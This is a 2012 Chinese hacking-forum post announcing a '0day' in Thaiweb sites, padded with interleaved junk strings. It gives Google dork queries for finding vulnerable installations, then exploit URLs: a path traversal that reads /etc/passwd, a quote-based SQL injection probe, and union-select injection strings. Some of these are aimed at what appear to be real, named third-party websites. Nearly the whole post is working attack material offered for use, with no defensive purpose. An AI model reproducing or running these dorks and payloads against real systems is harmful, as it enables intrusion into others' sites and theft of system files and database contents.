中国网络渗透测试联盟
标题:
Thaiweb远程文件sql注入漏洞0day
[打印本页]
作者:
admin
时间:
2012-12-27 08:38
标题:
Thaiweb远程文件sql注入漏洞0day
Google之:
! H2 h7 \) m3 ^& } K
5 P9 [- V' s& [/ j8 A
intext:powered by Thaiweb
! d- D4 s1 Z, l8 @8 L) g* b
/ M* P4 F% e/ g$ n& u2 K7 p
inurl:index.php?page=board.php
2 G! w$ `) ~4 d1 L6 M p
: [/ c; n6 v/ r# v
+ t( S: P& m$ G: g/ e( C: W* r; h
4 w% F9 m9 H) b& [
利用点1:
http://www.xfack.com/index.php?p ... ../../../etc/passwd
; K! A* R0 O& n, A
( P6 T& \) Y! F$ C: e }
; q* ?8 Z6 \. m& h5 k
- ]8 R; {8 A3 F2 n: {
利用点2:
http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
) G" K! t! G( p5 I3 o: S7 [
' {6 r! ]! X3 h' R% k! m3 r
8 J v9 A, _/ a S, K* _2 Q
: L, _! J! F4 ?9 S: [1 R% ?: @
http://www.keytasin.com//index.p ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
+ f% y+ [7 n2 X6 {+ m
4 p0 `" f) B# }5 _4 t' M
http://www.autopartnerthailand.c ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
/ @& Q( p5 e( [; X3 N) l1 P0 V
. _/ V5 o( N [3 J6 X
http://gift.in.th/index.php?page ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
/ q |9 `8 a+ A1 H
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2